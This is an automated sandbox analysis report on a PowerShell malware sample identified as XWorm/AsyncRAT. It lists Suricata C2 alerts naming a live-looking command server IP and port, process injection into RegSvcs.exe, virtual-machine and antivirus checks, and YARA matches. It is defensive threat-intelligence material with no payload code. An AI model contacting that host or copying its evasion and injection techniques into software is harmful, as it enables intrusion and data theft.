      Source: NLXwvLjXPh.ps1 | Virustotal: Detection: 11%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft

      Networking

      Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.155:4411 -> 192.168.2.6:49739
      Source: Network traffic Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.155:4411 -> 192.168.2.6:49739
      Source: Network traffic Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49739 -> 92.255.57.155:4411
      Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49739 -> 92.255.57.155:4411
      Source: Network traffic Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49739 -> 92.255.57.155:4411
      Source: Malware configuration extractor URLs: 92.255.57.155
      Source: global traffic TCP traffic: 192.168.2.6:49739 -> 92.255.57.155:4411
      Source: Joe Sandbox View ASN Name: TELSPRU TELSPRU
      Source: unknown TCP traffic detected without corresponding DNS query: 92.255.57.155
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF02CAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF01411000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Amcache.hve.0.dr String found in binary or memory: http://upx.sf.net
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.2410805237.000001FF7F6AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co(
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF01411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF0227D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.2389124323.000001FF02CAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

      System Summary

      Source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
      Source: Process Memory Space: RegSvcs.exe PID: 64, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process Stats: CPU usage > 49%
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 1360
      Source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
      Source: Process Memory Space: RegSvcs.exe PID: 64, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
      Source: 0.2.powershell.exe.1ff115a6960.3.raw.unpack, -----------------------------------------.cs Cryptographic APIs: 'CreateDecryptor'
      Source: 0.2.powershell.exe.1ff115a6960.3.raw.unpack, -----------------------------------------.cs Cryptographic APIs: 'TransformFinalBlock'
      Source: classification engine Classification label: mal100.troj.evad.winPS1@9/13@0/1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\o8kSNczORMveFDjV
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess64
      Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:764:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmc0542d.bhs.ps1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: NLXwvLjXPh.ps1 ReversingLabs: Detection: 15%
      Source: NLXwvLjXPh.ps1 Virustotal: Detection: 11%
      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3916" "2692" "2700" "2768" "0" "0" "2772" "0" "0" "0" "0" "0"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdatauser.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wer.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: aepic.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sfc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sfc_os.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: flightsettings.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
      Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Xml.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: HP$o0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER517A.tmp.dmp.11.dr
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2389124323.000001FF028D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: @0o.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdbRSDS source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Configuration.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbrn, source: RegSvcs.exe, 00000004.00000002.3885856490.00000000058B4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Xml.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbws source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Core.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: Microsoft.VisualBasic.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: %%.pdb source: RegSvcs.exe, 00000004.00000002.3887271040.000000000A09A000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb&G source: RegSvcs.exe, 00000004.00000002.3885856490.0000000005887000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdb source: WER517A.tmp.dmp.11.dr
      Source: Binary string: mscorlib.pdbH source: WER517A.tmp.dmp.11.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER517A.tmp.dmp.11.dr

      Data Obfuscation

      Source: 0.2.powershell.exe.1ff115a6960.3.raw.unpack, -----------------------------------------.cs.Net Code: _202B_200C_206B_202B_200F_202E_206A_206B_206F_206A_206F_206D_206B_206B_202B_202E_200B_200D_206C_202C_200E_200C_206B_202B_200C_200E_202E_200B_202A_200D_200C_206E_200B_206E_206E_202A_200B_206D_202A_202C_202E System.AppDomain.Load(byte[])
      Source: 0.2.powershell.exe.1ff115a6960.3.raw.unpack, -Module-.cs.Net Code: _202B_202D_200B_200C_202A_206F_206C_206C_200E_200E_202C_206B_200B_200E_202B_202B_200B_206B_200E_206D_206C_202B_200C_206F_206C_202A_200F_206F_206F_202D_206C_206A_206B_206E_202A_200C_202E_206A_200D_200F_202E System.Reflection.Assembly.Load(byte[])
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD341C00BD pushad ; iretd 0_2_00007FFD341C00C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD341C1B05 push eax; iretd 0_2_00007FFD341C1B5D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD341C1B5F push eax; iretd 0_2_00007FFD341C1B5D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_05B777C4 push ds; retf 4_2_05B777C7

      Persistence and Installation Behavior

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe System information queried: FirmwareTableInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4367
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5496
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 4017
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 5816
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872 Thread sleep time: -17524406870024063s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: PhysicalDrive0
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: Amcache.hve.0.dr Binary or memory string: VMware
      Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin
      Source: Amcache.hve.0.dr Binary or memory string: VMware, Inc.
      Source: Amcache.hve.0.dr Binary or memory string: VMware20,1hbin@
      Source: Amcache.hve.0.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.0.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.0.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.0.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
      Source: Amcache.hve.0.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.0.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.0.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: RegSvcs.exe, 00000004.00000002.3874168788.00000000013A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: Amcache.hve.0.dr Binary or memory string: vmci.sys
      Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin`
      Source: Amcache.hve.0.dr Binary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.0.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.dr Binary or memory string: VMware20,1
      Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.0.dr Binary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.0.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.0.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.0.dr Binary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.0.dr Binary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual RAM
      Source: Amcache.hve.0.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.0.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E4A008
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3916" "2692" "2700" "2768" "0" "0" "2772" "0" "0" "0" "0" "0"
      Source: RegSvcs.exe, 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: Amcache.hve.0.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: MsMpEng.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

      Stealing of Sensitive Information

      Source: Yara match File source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 64, type: MEMORYSTR

      Remote Access Functionality

      Source: Yara match File source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 64, type: MEMORYSTR

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
